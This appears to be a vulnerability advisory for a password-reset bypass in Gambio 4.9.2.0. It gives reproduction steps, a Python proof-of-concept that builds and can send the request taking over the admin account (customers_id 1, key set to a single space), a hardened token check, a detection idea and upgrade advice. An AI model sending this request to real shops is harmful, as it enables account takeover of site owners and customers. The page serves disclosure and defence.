Gambio Password Reset Bypass Vulnerability Allowing Arbitrary Passwords for Any Account

Vulnerability

A vulnerability in Gambio version 4.9.2.0 allows the password reset function to be bypassed. Anyone who knows the numeric ID of an account can set an arbitrary new password for it, because the reset-token check accepts a single space character in place of a valid token. The page does not state the underlying defect in the token comparison; only that a key consisting of a space passes the check.

Impact

Exploitation allows unauthorized password changes on any account whose ID is known, including the administrator account, and therefore full account takeover without knowledge of the current password or access to the account's mailbox.

Reproduction

To reproduce this vulnerability, send a POST request to 'password_double_opt.php' with the 'action' parameter set to 'save_password'. Include the 'customers_id' parameter with the ID of the target account (typically '1' for the admin account) and the 'key' parameter set to a single space (URL-encoded as '%20'). Fill the 'newPassword' and 'confirmedPassword' parameters with the desired new password. The request is processed without a valid reset token and the password of the specified account is changed.
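The request described above as a runnable proof-of-concept builder, together with the fail-closed token check that a fixed validator must pass. This is an added example, not Gambio's code and not the vendor's 4.9.2.1 patch; the shop URL (https://shop.example), the form content type and the stand-in stored token are assumptions, and the validator only illustrates the behaviour a correct check needs rather than the actual defect in 4.9.2.0.

```python
"""Added example (not Gambio's code): build the password-reset request from the
advisory and show the validator behaviour a fixed version must have.

Assumptions not stated on the page: the shop lives at BASE_URL, the endpoint
accepts application/x-www-form-urlencoded POSTs, and the 'stored' argument of
reset_key_is_valid stands in for whatever token the shop has on record.
"""
import hmac
import urllib.parse
import urllib.request

BASE_URL = "https://shop.example"  # assumed; replace with the shop under test
ENDPOINT = "/password_double_opt.php"


def build_poc_body(customers_id: int, new_password: str, key: str = " ") -> str:
    """Return the URL-encoded form body from the advisory.

    'key' defaults to a single space, which is what the advisory says slips
    past the 4.9.2.0 token check. quote_via=quote encodes the space as %20
    instead of '+' so the body matches the write-up literally (PHP decodes
    both to a space).
    """
    params = {
        "action": "save_password",
        "customers_id": str(customers_id),
        "key": key,
        "newPassword": new_password,
        "confirmedPassword": new_password,
    }
    return urllib.parse.urlencode(params, quote_via=urllib.parse.quote)


def build_poc_request(customers_id: int, new_password: str,
                      base_url: str = BASE_URL) -> urllib.request.Request:
    """Wrap the body in a POST request object; nothing is sent until urlopen()."""
    body = build_poc_body(customers_id, new_password).encode()
    return urllib.request.Request(
        base_url + ENDPOINT,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def send_poc(customers_id: int, new_password: str, base_url: str = BASE_URL) -> int:
    """Send the request (needs network access to the shop) and return the HTTP status."""
    req = build_poc_request(customers_id, new_password, base_url)
    with urllib.request.urlopen(req) as resp:
        return resp.status


def reset_key_is_valid(submitted: str, stored: str) -> bool:
    """Illustrative fail-closed token check (not Gambio's patch).

    A missing, empty or whitespace-only submitted key is rejected before any
    comparison is attempted, a missing stored token rejects as well, and the
    comparison itself is constant-time. Whatever the exact defect in 4.9.2.0
    was, this predicate returns False for the single-space key the advisory
    uses.
    """
    if not stored or not submitted or not submitted.strip():
        return False
    return hmac.compare_digest(submitted.encode(), stored.encode())


if __name__ == "__main__":
    # Print the request a tester would send for customers_id 1; send_poc() is
    # left to the reader because it requires a reachable, authorised target.
    req = build_poc_request(1, "Str0ngPass")
    print(req.get_method(), req.full_url)
    print(req.data.decode())
    print("space key accepted by hardened check:", reset_key_is_valid(" ", "abc123"))
```

Only run send_poc() against an instance you are authorised to test; the builder functions are enough to confirm the request shape and to write a detection rule for a proxy or WAF (a 'save_password' action whose 'key' is blank or whitespace-only).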

Remediation

Update to Gambio version 4.9.2.1, which addresses this vulnerability. The page lists no workaround, so until the update is applied every account, including the admin account with ID 1, is exposed to a password reset by anyone who knows its ID.

Added: May 5, 2026, 2:20 PM
Updated: May 5, 2026, 2:20 PM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 3.1
exploitability: 9.7
remediation: 7.7
relevance: 7.4
threat: 6.4
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.